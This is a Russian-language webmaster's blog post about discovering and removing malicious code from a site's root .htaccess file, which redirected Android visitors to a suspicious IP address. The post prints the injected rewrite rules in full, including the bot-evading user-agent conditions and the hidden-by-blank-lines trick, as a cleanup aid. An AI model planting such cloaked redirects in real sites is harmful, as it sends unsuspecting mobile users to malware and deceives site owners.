Подписывайтесь:

Получать обновления на e-mail:


Цитатко

— С тобой мой меч!
— И мой топор!
— И мой лук!
— Мужики, тут такое дело… Короче, они на танках.

Борьба с вирусом для мобильных устройств

Автор kbaott, 02.03.2015 | Просмотров: 53 | Печать

Друзья мои, я всех приветствую! На днях я снова взялся за Notepad++ и стал работать над адаптивностью данного блога. Дело шло так себе, но в определенный момент при тестировании с мобильных устройств я обнаружил, что браузер ругается на то, что мобильная версия сайта пытается перенаправить пользователя на какую-то левую страничку с очень подозрительным адресом:

http://5.61.34.53/jquery/htaccess.php

При этом Яндекс.Барузер показывает неприятную для всех вебмастеров страничку: «Сайт может угрожать безопасности вашего компьютера«. Понятно, что это вирус и с ним нужно бороться. В процессе тестирования выяснилось точно, что это вирус, который делает переадресацию пользователей с мобильных устройств (как правило под управлением Android) по вот той ссылке, то есть на сайт вредителя.

Многим известный скрипт поиска вредоносного кода Ai-Bolit как ни странно ничего не нашел. Google и Яндекс также ни чем не помогли. По дате последнего изменения файлов движка также внятного ничего не удалось установить, так как файлы CMS я правлю часто и уследить, что сделал я, а что «вирь» — сложно. Поэтому пришлось скачивать практически весь сайт на локальный компьютер. Н у и первым делом я запустил мой любимый Notepad++, задал «Поиск по файлам» с запросом 5.61.34.53. И самое интересное, что в три секунды подлец нашелся — он сидел в корневом .htaccess.

как, спрашивается, он там оказался и почему я его там не увидел, ведь я лично открывал этот файл в первую очередь?! А так — вирус прописал редирект не просто в конце этого файла, а добавил еще около ста переходов на новую строку и, конечно, быстро просматривая файлы можно просто не заметить эту хитрость. Рассчитано на невнимательность, на чем я и попался.

Итак, вот этот код, который нужно удалить из файла .htaccess который лежит в корне сайта (код начинается примерно со 130 строки):

RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://5.61.34.53/jquery/htaccess.php [L,R=302] # on

После удаления все нормально. Сразу же стоит поменять пароли на FTP и/или вообще в админке хостинга отключить доступ по FTP и включать его когда потребуется. Также желательно не пользоваться для работы по FTP взломанным Total Commander — из него легко уводят ся пароли. Хотя если честно, то пароли увести можно откуда угодно, но лучше уменьшить этот список, хотя бы, не пользуясь для работы с сайтами ломаным и хаканым софтом.

Конечно, этот код может быть и несколько видоизмененным и не обязательно он будет вести на сайт с вирусом. Я встречал жалобы, что примерно такой же код встраивали конкуренты для перенаправления на свой сайт. А еще так SEO-шники балуются, накачивая мобильный (и не только) трафик на свои говно-блоги, за что и перестрелял бы их всех без суда и следствия.

Также замечу, что CMS, на которой работает сайт в целом не важна: ломали как и WordPress, так и Joomla, так и «Битрикс», и Drupal.

Ну вот и все. Здоровья вам и вашим сайтам.

Метки: , , ,
Писано 02.03.2015

Понравилась статья? Тогда получайте обновления на e-mail:

Комментарии
Вконтакте
Top